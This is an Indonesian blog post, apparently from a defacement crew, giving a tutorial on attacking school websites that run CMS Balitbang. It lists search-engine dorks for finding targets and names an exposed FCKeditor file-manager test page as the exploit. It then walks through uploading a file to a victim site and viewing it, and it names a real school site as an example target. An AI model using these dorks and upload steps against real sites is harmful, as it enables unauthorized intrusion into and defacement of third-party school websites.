Bug CMS Balitbang

HSS Cyber Crew-  Sedikit membahas tentang CMS Balitbang, CMS Balitbang adalah salah satu CMS ( Content Management System ) yang sudah siap pakai dan biasanya dipergunakan untuk web sekolah. CMS ini dikembangkan oleh Balitbang Kemendiknas Indonesia.

Namun CMS buatan Indonesia ini masih mempunyai kelemahan/bug. Langsung Chek Cuk :V

Dork in google..
1. inurl:"/html/index.php" intext:"Tim Balitbang"
2. inurl:"/html/index.php" intitle:"Selamat Datang"
3. inurl:"/member/" intext:"Tim Balitbang"

Dork in bing..
1. IP:[target-IP] /html/
2. IP:[target-IP] sch.id
3. IP:[target-IP] ac.id
4. IP:[target-IP] blablablaa… 

Exploit : /editor/filemanager/connectors/test.html

1). Masukan salah satu dork diatas untuk mencari bug pada CMS Balitbang
2). Kemudian pilih salah satu website dari hasil pencarian menggunakan dork tersebut 

 

3). Tampilan awal web target.

 

4). Setelah itu kita masukan exploit untuk CMS Balitbang pada url target di addressbar lalu tekan Enter.maka keluar seperti ini. Berikut SS nya

 6). Ubah menu ASP menjadi PHP dan selanjutnya kita pilih file yang akan kita sisipkan kedalam web target. dan Upload File Yg ber Eksitensi .TXT (Pake Notepad :v)

 7). Klik Upload Jika Sukses Maka Keluar Pop Up Seperti Berikut SS nya

 8).Untuk Melihat Hasil Nya Ketik http://target.com/userfiles/file/Nama_File.txt
Contoh http://www.sman1kotabaru.sch.id/userfiles/file/MCyber.txt  maka Keluar Seperti Dibawah ini :v

Posted in: Deface